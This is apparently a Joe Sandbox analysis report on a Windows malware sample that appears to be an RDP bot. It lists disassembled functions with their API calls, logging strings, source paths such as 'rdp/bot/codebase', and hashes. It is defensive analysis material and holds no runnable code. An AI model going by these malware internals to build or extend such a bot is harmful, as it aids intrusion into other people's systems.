Instruction Fuzzy Hash: 48F10061E1C61382FB707754E4D43BC1291AB8F358F256132C61ECAAFBCE7DA8859706

Function 00007FF64B931131 Relevance: 13.6, APIs: 9, Instructions: 120
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF64B931313), ref: 00007FF64B93116E
_amsg_exit.MSVCRT(?,?,?,00007FF64B931313), ref: 00007FF64B93118D
_initterm.MSVCRT ref: 00007FF64B9311AE
_initterm.MSVCRT ref: 00007FF64B9311D3
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF64B931212
malloc.MSVCRT ref: 00007FF64B931244
strlen.MSVCRT ref: 00007FF64B93125C
malloc.MSVCRT ref: 00007FF64B931268
_cexit.MSVCRT(?,?,?,00007FF64B931313), ref: 00007FF64B9312E3

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
String ID:
API String ID: 3714283218-0
Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction ID: 3dc7a8ca65c935955d7d53130d4a32c8849f47c59e0e97e247bb47102a333fbc
Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
Instruction Fuzzy Hash: 19512865A0CA5689FB50BB66E8502B923A0AF4FB94F049535CD2DC77B3DE2CE8518740

Function 00007FF64B9345D5 Relevance: 72.0, APIs: 24, Strings: 17, Instructions: 298
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF64B93461A
fseek.MSVCRT ref: 00007FF64B934639
_errno.MSVCRT ref: 00007FF64B93464D
_errno.MSVCRT ref: 00007FF64B934668
_errno.MSVCRT ref: 00007FF64B934727

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

_errno.MSVCRT ref: 00007FF64B934742
_errno.MSVCRT ref: 00007FF64B93478F
fclose.MSVCRT ref: 00007FF64B934B30

Strings

[I] (%s) -> Done(path=%s,buf_sz=%llu), xrefs: 00007FF64B934BAF
fs_file_read, xrefs: 00007FF64B934655, 00007FF64B93469D, 00007FF64B9346D0, 00007FF64B934703, 00007FF64B93472F, 00007FF64B93483A, 00007FF64B934950, 00007FF64B934A1B, 00007FF64B934ADA, 00007FF64B934B65, 00007FF64B934BA8
NULL, xrefs: 00007FF64B934B99
[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld), xrefs: 00007FF64B934AE1
[E] (%s) -> ftell failed(path=%s,errno=%d), xrefs: 00007FF64B934841
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF64B9349FB
[E] (%s) -> fread failed(path=%s,errno=%d), xrefs: 00007FF64B934A22
(path != NULL), xrefs: 00007FF64B934696
(buf_sz != NULL), xrefs: 00007FF64B9346C9
(((*buf) == NULL) || ((*buf_sz) > 0)), xrefs: 00007FF64B9346FC
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B934B6C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9346A4, 00007FF64B9346D7, 00007FF64B93470A
[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d), xrefs: 00007FF64B93465C
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B93468F, 00007FF64B9346C2, 00007FF64B9346F5
mem_alloc, xrefs: 00007FF64B9349F4
[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d), xrefs: 00007FF64B934957
[E] (%s) -> fopen failed(path=%s,errno=%d), xrefs: 00007FF64B934736

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: _errno$fclosefflushfopenfseekfwrite
String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
API String ID: 2897271634-4120527733
Opcode ID: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
Instruction ID: 81a2b335ac485163e22f98ceb562471a06acef14b7598db94a5f3e89dfaa8f02
Opcode Fuzzy Hash: f9c10c2996a5af623a9f831bd9c4aaf4b69e569eb9c4efce4151118f17c367f6
Instruction Fuzzy Hash: 72D16E21A0CA4791FA20BBA9E8407B83361BF4E795F566532D91DD7BB7EE3CE4458300

Function 00007FF64B93433B Relevance: 31.6, APIs: 8, Strings: 10, Instructions: 133
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

fopen.MSVCRT ref: 00007FF64B934363
_errno.MSVCRT ref: 00007FF64B93444F
_errno.MSVCRT ref: 00007FF64B934470
fwrite.MSVCRT ref: 00007FF64B9344E4

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B934402, 00007FF64B934432
(mode != NULL), xrefs: 00007FF64B934424
[E] (%s) -> Failed(path=%s,mode=%s,err=%08x), xrefs: 00007FF64B9343CC
NULL, xrefs: 00007FF64B93459A, 00007FF64B9345A6
[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu), xrefs: 00007FF64B9345C4
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B9343ED, 00007FF64B93441D
(path != NULL), xrefs: 00007FF64B9343F4
[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF64B934464
fs_file_write, xrefs: 00007FF64B9343C5, 00007FF64B9343FB, 00007FF64B93442B, 00007FF64B93445D, 00007FF64B93450D, 00007FF64B9345BD
[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d), xrefs: 00007FF64B934514

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: _errno$fopenfwrite
String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
API String ID: 1336347884-544371937
Opcode ID: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
Instruction ID: e8e123277b6c20afda5b046e08f7582b78b1f61d2a23535596366ce8c60a9f59
Opcode Fuzzy Hash: fd71ba3db7f327798de58cdc59b1f8f8ea9ece55cf0b0fbe97b514d8da62ca52
Instruction Fuzzy Hash: 9E518361A0C64792FA10BB69D9402B863A1BF4F794F591136D92DC7BB7DF3CE5468300

Function 00007FF64B93168C Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FF64B9316AC
GetLastError.KERNEL32 ref: 00007FF64B9317E0

Part of subcall function 00007FF64B9319C0: GetModuleHandleExA.KERNEL32 ref: 00007FF64B9319DE

strlen.MSVCRT ref: 00007FF64B9316FE
strlen.MSVCRT ref: 00007FF64B93171A
strcat.MSVCRT ref: 00007FF64B931735
strlen.MSVCRT ref: 00007FF64B93173D
strlen.MSVCRT ref: 00007FF64B931752
fopen.MSVCRT ref: 00007FF64B931778

Strings

[E] (%s) -> Log open failed(flog_path=%s), xrefs: 00007FF64B9318B7
debug_init, xrefs: 00007FF64B93179E, 00007FF64B9317C3, 00007FF64B9317EB, 00007FF64B9318B0, 00007FF64B931924
[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu), xrefs: 00007FF64B9317F2
[E] (%s) -> Failed(err=%08x), xrefs: 00007FF64B9317CA
[I] (%s) -> %s, xrefs: 00007FF64B93192B
wfpblk.l, xrefs: 00007FF64B93175A
[I] (%s) -> Log open success(flog_path=%s), xrefs: 00007FF64B9317A5
Done, xrefs: 00007FF64B93191D
log, xrefs: 00007FF64B931767

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
API String ID: 3395718042-2291025694
Opcode ID: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
Instruction ID: e7a632816aadbf9ce3f4de83c2151091d24bdab7aa8f48373ef0a512a892ad05
Opcode Fuzzy Hash: 8162a81c9e43a89fbec366be30bd812177f940d51fad0d5cb0870f2ffc37eb56
Instruction Fuzzy Hash: 52512C50E1C72791FA24BB51E8803B82395AF0F744F546132C61EC6AB3DF6CB996C351

Function 00007FF64B935E6F Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 199
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32 ref: 00007FF64B935EC7
LockFileEx.KERNEL32 ref: 00007FF64B935F00
GetLastError.KERNEL32 ref: 00007FF64B935FD5
GetLastError.KERNEL32 ref: 00007FF64B9360BA
CloseHandle.KERNEL32 ref: 00007FF64B93622E

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B935F5B
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B935F8F, 00007FF64B935FBF
NULL, xrefs: 00007FF64B936239
(lock != NULL), xrefs: 00007FF64B935FB1
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF64B936252
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF64B935F7A, 00007FF64B935FAA
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF64B935FEA
(path != NULL), xrefs: 00007FF64B935F81
fs_file_lock, xrefs: 00007FF64B935F54, 00007FF64B935F88, 00007FF64B935FB8, 00007FF64B935FE3, 00007FF64B9360C8, 00007FF64B93624B
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF64B9360CF

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
API String ID: 2747014929-530486279
Opcode ID: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
Instruction ID: 8dd153065c5a055fdee4c7124b6bbc912d31e6164c0b551128ced1401f3d70a5
Opcode Fuzzy Hash: e4f34f73a7c2b9193ad35b742d97c622cba79fc7e1d163be5dbedb326e79ab52
Instruction Fuzzy Hash: 2E813E60E0C74A81FA70B754E44477832505F5F358F646232DD6EC7AF3EE6EA9858342

Function 00007FF64B9397F2 Relevance: 25.7, APIs: 7, Strings: 10, Instructions: 241
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 00007FF64B93983D
HeapFree.KERNEL32 ref: 00007FF64B93984E

Part of subcall function 00007FF64B9345D5: fopen.MSVCRT ref: 00007FF64B93461A
Part of subcall function 00007FF64B9345D5: fseek.MSVCRT ref: 00007FF64B934639
Part of subcall function 00007FF64B9345D5: _errno.MSVCRT ref: 00007FF64B93464D
Part of subcall function 00007FF64B9345D5: _errno.MSVCRT ref: 00007FF64B934668

GetProcessHeap.KERNEL32 ref: 00007FF64B93997A
HeapAlloc.KERNEL32 ref: 00007FF64B93998B
strncpy.MSVCRT ref: 00007FF64B939ACC
strncpy.MSVCRT ref: 00007FF64B939AE3
strncpy.MSVCRT ref: 00007FF64B939B42

Part of subcall function 00007FF64B9314E2: fwrite.MSVCRT ref: 00007FF64B93158E
Part of subcall function 00007FF64B9314E2: fflush.MSVCRT ref: 00007FF64B93159A

Strings

[I] (%s) -> Done(path=%s), xrefs: 00007FF64B939BA8
(path != NULL), xrefs: 00007FF64B9398B4
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF64B9399DA
mem_alloc, xrefs: 00007FF64B9399D3
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B9398C2
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF64B939886
ini_load, xrefs: 00007FF64B93987F, 00007FF64B9398BB, 00007FF64B939BA1
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B9398AD
NULL, xrefs: 00007FF64B939B92
5, xrefs: 00007FF64B9398A5

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
API String ID: 1423203057-2746879330
Opcode ID: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
Instruction ID: 78edd87c12636b3472bcb1091c63762bfce7a2ae4a8d4327f60d0f8a2a5731be
Opcode Fuzzy Hash: e29854694c0f8539840e8829ac9a0304c53863f31d6bfdd38f35223ef1fc52e9
Instruction Fuzzy Hash: 0AA1F262A0D68681EA20BB15E4507B92760EF6E784F49503ADA8EC7FB7DE3CE545C300

Function 00007FF64B939181 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF64B938EEF
GetProcessHeap.KERNEL32 ref: 00007FF64B938F6B
HeapAlloc.KERNEL32 ref: 00007FF64B938F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF64B939010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF64B93905D
GetProcessHeap.KERNEL32 ref: 00007FF64B9390F2
HeapFree.KERNEL32 ref: 00007FF64B939103

Strings

block_svc, xrefs: 00007FF64B939070
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF64B939077

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
Instruction ID: 1da36d4e42f207c01e49a53cdddf2374e833d00eecdd2a9946284648996b3117
Opcode Fuzzy Hash: b835f1c21479f05cc4f62c9c6d58b6c7f059bc0905a0a235bc16e00a61526ada
Instruction Fuzzy Hash: 84518E3260CBC285E770AB51E4843AAB760FB9A744F005135CA8DC3BAAEF3DD549CB41

Function 00007FF64B93918B Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF64B938EEF
GetProcessHeap.KERNEL32 ref: 00007FF64B938F6B
HeapAlloc.KERNEL32 ref: 00007FF64B938F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF64B939010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF64B93905D
GetProcessHeap.KERNEL32 ref: 00007FF64B9390F2
HeapFree.KERNEL32 ref: 00007FF64B939103

Strings

block_svc, xrefs: 00007FF64B939070
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF64B939077

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
Instruction ID: c9146b33a5f8b32258c7be39423e605665bd1196a938323d65146361388fef64
Opcode Fuzzy Hash: 0e94d3148b609dee0ff2560a2a89d769e9fadb2db872d082aeb89c006e5dbd4c
Instruction Fuzzy Hash: 95518C3260CBC285E770AB51E4843AAB760FB9A744F005135CA8DC3BAAEF3DD549CB41

Function 00007FF64B939195 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 111
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strlen.MSVCRT ref: 00007FF64B938EEF
GetProcessHeap.KERNEL32 ref: 00007FF64B938F6B
HeapAlloc.KERNEL32 ref: 00007FF64B938F7C
BuildTrusteeWithSidW.ADVAPI32 ref: 00007FF64B939010
BuildSecurityDescriptorW.ADVAPI32 ref: 00007FF64B93905D
GetProcessHeap.KERNEL32 ref: 00007FF64B9390F2
HeapFree.KERNEL32 ref: 00007FF64B939103

Strings

block_svc, xrefs: 00007FF64B939070
[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu), xrefs: 00007FF64B939077

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: Heap$BuildProcess$AllocDescriptorFreeSecurityTrusteeWithstrlen
String ID: [E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$block_svc
API String ID: 493744553-3317923414
Opcode ID: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
Instruction ID: e61566c1a48039df4b3e3ad65ddb3595e9c6136e32ab00857657c1c1be56f761
Opcode Fuzzy Hash: 69ac0cd501d4a87c8b17967b6e58fd6349226e74b1adf778597a72746b022cf6
Instruction Fuzzy Hash: B8518E3260CBC285E770AB51E4843AAB760FB9A744F005135CA8DC3BAAEF3DD549CB41

Function 00007FF64B939D40 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF64B939E2C

Strings

ini_get_var, xrefs: 00007FF64B939D89, 00007FF64B939DBC, 00007FF64B939DEF, 00007FF64B939E56, 00007FF64B939E9E
(sec != NULL), xrefs: 00007FF64B939D82
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B939D90, 00007FF64B939DC3, 00007FF64B939DF6
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FF64B939E5D
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF64B939D7B, 00007FF64B939DAE, 00007FF64B939DE1
NULL, xrefs: 00007FF64B939EBE, 00007FF64B939EC7
(var != NULL), xrefs: 00007FF64B939DE8
[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FF64B939EA5
(name != NULL), xrefs: 00007FF64B939DB5

Memory Dump Source

Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true

Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
Instruction ID: 6b3b52f1f4a28b17d94f24b37900029aca6692fec7a0e697f8577b48754c98c2
Opcode Fuzzy Hash: 44972bb0c6209c6f17ce433e491e293207ec20daf1049f6ba9f0944a71f4938d
Instruction Fuzzy Hash: C8413C61A0C647A1FAA0BB81E9407B52760BF1E344F545036DA6EC69B6DF3CA94AC341

Function 00007FF64B939BB9 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 90
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strcmp.MSVCRT ref: 00007FF64B939CAD

Strings

[W] (%s) -> Failed(name=%s,err=%08x), xrefs: 00007FF64B939D0B
(sec != NULL), xrefs: 00007FF64B939C61
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF64B939C09, 00007FF64B939C3C, 00007FF64B939C6F
